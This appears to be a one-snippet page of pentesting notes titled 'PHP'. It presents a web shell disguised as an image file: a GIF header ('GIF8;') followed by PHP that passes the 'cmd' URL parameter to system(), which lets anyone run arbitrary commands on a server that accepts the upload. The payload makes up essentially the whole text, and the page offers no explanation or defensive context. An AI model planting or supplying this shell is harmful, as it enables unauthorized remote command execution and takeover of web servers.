PHP

Quick snippet:

Disguise filetype and make system calls.

GIF8;
<?php echo "<pre>";
system($_GET['cmd']); ?>

Last updated